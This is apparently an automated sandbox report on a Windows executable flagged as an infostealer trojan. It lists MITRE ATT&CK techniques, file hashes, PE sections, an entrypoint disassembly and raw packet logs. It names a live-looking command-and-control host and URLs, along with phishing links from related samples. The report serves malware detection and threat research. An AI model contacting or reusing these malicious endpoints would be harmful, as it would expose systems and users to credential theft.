Source: Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.10:49706 -> 91.149.241.220:80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	23 Virtualization/Sandbox Evasion	OS Credential Dumping	751 Security Software Discovery	1 Exploitation of Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	23 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	13 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	216 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Hqle5OSmLQ.exe	49%	Virustotal		Browse
Hqle5OSmLQ.exe	100%	Avira	TR/Crypt.TPM.Gen
Hqle5OSmLQ.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://home.fortth14vs.top/gduZE_	0%	Avira URL Cloud	safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18	0%	Avira URL Cloud	safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738ff::3	0%	Avira URL Cloud	safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738	0%	Avira URL Cloud	safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0	0%	Avira URL Cloud	safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah	0%	Avira URL Cloud	safe
http://home.fortth14vs.top/gduZ	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
home.fortth14vs.top	91.149.241.220	true	false	high
httpbin.org	34.197.122.172	true	false	high
18.31.95.13.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0	true	Avira URL Cloud: safe	unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738	true	Avira URL Cloud: safe	unknown
https://httpbin.org/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	false		high
http://html4/loose.dtd	Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	false		high
https://httpbin.org/ipbefore	Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah	Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/http-cookies.html	Hqle5OSmLQ.exe, Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fortth14vs.top/gduZE_	Hqle5OSmLQ.exe, 00000000.00000003.1525947436.0000000001F6C000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526346109.0000000001FA9000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1550422328.0000000001FAC000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526031038.0000000001FA6000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526592917.0000000001FAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18	Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/hsts.html#	Hqle5OSmLQ.exe	false		high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738ff::3	Hqle5OSmLQ.exe, 00000000.00000003.1526574789.0000000001F38000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1550090351.0000000001F3A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.fortth14vs.top/gduZ	Hqle5OSmLQ.exe, Hqle5OSmLQ.exe, 00000000.00000003.1525947436.0000000001F6C000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526346109.0000000001FA9000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1550422328.0000000001FAC000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526031038.0000000001FA6000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526592917.0000000001FAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html	Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	false		high
http://.css	Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	false		high
http://.jpg	Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.149.241.220	home.fortth14vs.top	Poland		41952	MARTON-ASPL	false
34.197.122.172	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582698
Start date and time:	2024-12-31 09:44:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Hqle5OSmLQ.exe renamed because original name is a hash value
Original Sample Name:	4f6dab981f84c2ddb35307b748427e30.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@10/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.95.31.18, 20.109.210.53
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.197.122.172	Set-up.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	Set-up.exe	Get hash	malicious	Unknown	Browse	52.202.253.164
	Set-up.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	Set-up.exe	Get hash	malicious	Unknown	Browse	52.73.63.247
	a2mNMrPxow.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	FIyDwZM4OR.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	ZFttiy4Tt8.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	e62iSl0abZ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	HGFSqmKwd5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MARTON-ASPL	mips.elf	Get hash	malicious	Unknown	Browse	91.149.238.18
	ppc.elf	Get hash	malicious	Unknown	Browse	91.149.238.18
	mpsl.elf	Get hash	malicious	Unknown	Browse	91.149.238.18
	arm5.elf	Get hash	malicious	Unknown	Browse	91.149.238.18
	arm7.elf	Get hash	malicious	Unknown	Browse	91.149.238.18
	harm4.elf	Get hash	malicious	Unknown	Browse	91.149.238.18
	harm5.elf	Get hash	malicious	Unknown	Browse	91.149.238.18
	harm4.elf	Get hash	malicious	Unknown	Browse	91.149.238.18
	nshsh4.elf	Get hash	malicious	Unknown	Browse	91.149.238.18
	nsharm5.elf	Get hash	malicious	Unknown	Browse	91.149.238.18
AMAZON-AESUS	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	44.221.84.105
	http://ghostbin.cafe24.com/	Get hash	malicious	Unknown	Browse	44.199.56.69
	Set-up.exe	Get hash	malicious	Unknown	Browse	52.202.253.164
	kwari.mips.elf	Get hash	malicious	Unknown	Browse	54.226.65.111
	Set-up.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188	Get hash	malicious	KnowBe4	Browse	3.88.121.169
	https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857	Get hash	malicious	KnowBe4	Browse	3.88.121.169
	securedoc_20241220T111852.html	Get hash	malicious	Unknown	Browse	44.219.110.92
	https://visa-pwr.com/	Get hash	malicious	Unknown	Browse	3.208.228.173
	botx.mips.elf	Get hash	malicious	Mirai	Browse	52.0.196.218

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.983150481861064
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Hqle5OSmLQ.exe
File size:	4'512'256 bytes
MD5:	4f6dab981f84c2ddb35307b748427e30
SHA1:	1dfe133b03505c6969babf5b533620e3b240ffda
SHA256:	564084e14d92f08cd1e05273a44bfaf11dd7e539e64943ff59cc651622c18268
SHA512:	929236923c2d2e9adf27050a9e0b497f3681f25ad82902f02b89213d6ff8412da1464ae825a7d9e5d393e9535eda28d85d8709ab150aa6af348c8b37da836882
SSDEEP:	98304:pxum0DsExjEQkw3NeGqcmw19vCIroMGj0K9Gl3Z/k9gfE:psm0sw3QGqcdsmjFy9gs
TLSH:	0D263338C5374A7FCBA3453570A4D29C3AC5A7D30DED03EE2A8ADB5546B720492C369E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2... ........M...@..........................P........E...@... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x10b2000
Entrypoint Section:	.taggant
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
jmp 00007FA94CF7791Ah
popcnt eax, dword ptr [eax+eax+00h]
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x74c05f	0x73	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x74b000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x778200	0x688
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xcb0b5c	0x10	kowmzman
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xcb0b0c	0x18	kowmzman
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x74a000	0x289000	b85ba3d3f935fe3dee9e553da8e6b873	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x74b000	0x2b0	0x200	4e8a1a23931437534811944bdcab4ecd	False	0.798828125	data	6.111837256576579	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x74c000	0x1000	0x200	52564c2cea63394dbc4e71775ebabcc0	False	0.166015625	data	1.1589685166080708	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x74d000	0x3a3000	0x200	b6cb45534fd8795973aaaf8c360d7cf9	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kowmzman	0xaf0000	0x1c1000	0x1c0e00	2a53cfd18f749a8e6112983a25f99a8f	False	0.9945295095377332	data	7.9564462863177505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sikkulpd	0xcb1000	0x1000	0x400	abcf6e96be48faf36d35fc9c15193cb7	False	0.748046875	data	5.866429533825204	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xcb2000	0x3000	0x2200	0742d5f77b5d3ddc54f349a5f02e02cf	False	0.0744485294117647	DOS executable (COM)	0.7679228644337672	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xcb0b6c	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 09:45:23.113459110 CET	49705	443	192.168.2.10	34.197.122.172
Dec 31, 2024 09:45:23.113492966 CET	443	49705	34.197.122.172	192.168.2.10
Dec 31, 2024 09:45:23.113614082 CET	49705	443	192.168.2.10	34.197.122.172
Dec 31, 2024 09:45:23.125128984 CET	49705	443	192.168.2.10	34.197.122.172
Dec 31, 2024 09:45:23.125142097 CET	443	49705	34.197.122.172	192.168.2.10
Dec 31, 2024 09:45:23.779037952 CET	443	49705	34.197.122.172	192.168.2.10
Dec 31, 2024 09:45:23.779680967 CET	49705	443	192.168.2.10	34.197.122.172
Dec 31, 2024 09:45:23.779700041 CET	443	49705	34.197.122.172	192.168.2.10
Dec 31, 2024 09:45:23.781167030 CET	443	49705	34.197.122.172	192.168.2.10
Dec 31, 2024 09:45:23.781275034 CET	49705	443	192.168.2.10	34.197.122.172
Dec 31, 2024 09:45:23.782557964 CET	49705	443	192.168.2.10	34.197.122.172
Dec 31, 2024 09:45:23.782622099 CET	443	49705	34.197.122.172	192.168.2.10
Dec 31, 2024 09:45:23.782778978 CET	49705	443	192.168.2.10	34.197.122.172
Dec 31, 2024 09:45:23.823349953 CET	443	49705	34.197.122.172	192.168.2.10
Dec 31, 2024 09:45:23.823865891 CET	49705	443	192.168.2.10	34.197.122.172
Dec 31, 2024 09:45:23.823879004 CET	443	49705	34.197.122.172	192.168.2.10
Dec 31, 2024 09:45:23.870776892 CET	49705	443	192.168.2.10	34.197.122.172
Dec 31, 2024 09:45:24.686173916 CET	443	49705	34.197.122.172	192.168.2.10
Dec 31, 2024 09:45:24.686249018 CET	443	49705	34.197.122.172	192.168.2.10
Dec 31, 2024 09:45:24.686305046 CET	49705	443	192.168.2.10	34.197.122.172
Dec 31, 2024 09:45:24.694983006 CET	49705	443	192.168.2.10	34.197.122.172
Dec 31, 2024 09:45:24.695003033 CET	443	49705	34.197.122.172	192.168.2.10
Dec 31, 2024 09:45:26.789884090 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:26.794835091 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.800472975 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:26.801568031 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:26.806483030 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.806499958 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.806519032 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.806529045 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.806607008 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:26.806622982 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.806632042 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.806677103 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.806682110 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:26.806684971 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.806713104 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.806721926 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.806730032 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:26.806771040 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:26.811470985 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.811510086 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.811520100 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.811598063 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:26.811609983 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.811629057 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.811639071 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.811686039 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:26.855000019 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.855261087 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:26.902924061 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.903016090 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:26.954960108 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:26.955034018 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.002968073 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.004468918 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.054990053 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.056404114 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.102900028 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.102999926 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.151036024 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.151148081 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.202944040 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.203005075 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.251012087 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.251116037 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.264347076 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.264574051 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.269475937 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269488096 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269507885 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269519091 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269531012 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269546986 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269582033 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.269603968 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269608021 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.269613028 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269630909 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269639969 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269659042 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.269690037 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.269699097 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269707918 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269740105 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269748926 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269757032 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269757032 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.269766092 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269799948 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269809008 CET	49706	80	192.168.2.10	91.149.241.220
